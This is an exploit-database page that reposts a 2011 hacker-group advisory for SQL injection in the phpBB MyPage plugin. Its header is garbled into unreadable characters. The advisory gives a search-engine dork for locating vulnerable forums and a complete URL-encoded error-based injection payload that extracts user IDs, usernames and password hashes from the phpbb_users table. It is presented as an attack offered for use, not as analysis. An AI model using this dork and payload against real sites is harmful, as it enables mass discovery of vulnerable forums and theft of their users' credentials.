phpBB MyPage Plugin SQL Injection

ʱ: 2011-12-06 (GMT+0800)

Է:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.====================================================2. MyPage plugin (phpBB) SQL Injection (All versions)3.====================================================4. 5.====================================================6.Improve your hacking knowledges !7.====================================================8.====================================================9.VISIT http://HackSociety.net !10.====================================================11. 12.# Exploit Title: SQL Injection on the plugin phpBB plugin MyPage13.# Google Dork: inurl:"mypage.php?id="14.# Date: 06/12/201115.# Author: CrazyMouse (from HackSociety.net)16.# Version: 0.2.3 (this is the last avaliable version, older versions are also vulnerable)17.# Tested on: Windows 7 x64 (Firefox)18. 19.====================================================20.VISIT http://HackSociety.net !21.====================================================22. 23. 24.[~] Exploit:25.   26.        http://localhost/forum/27.  28.  29.[~]     http://localhost/forum/mypage.php?id= (SQL)30. 31. 32.[~] Example:33. 34.    http://server/forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%27135. 36. 37.====================================================38.   39.# Thanks to40.  41.Crassus42.  43.====================================================44. 45. 46.====================================================47.VISIT http://HackSociety.net !48.====================================================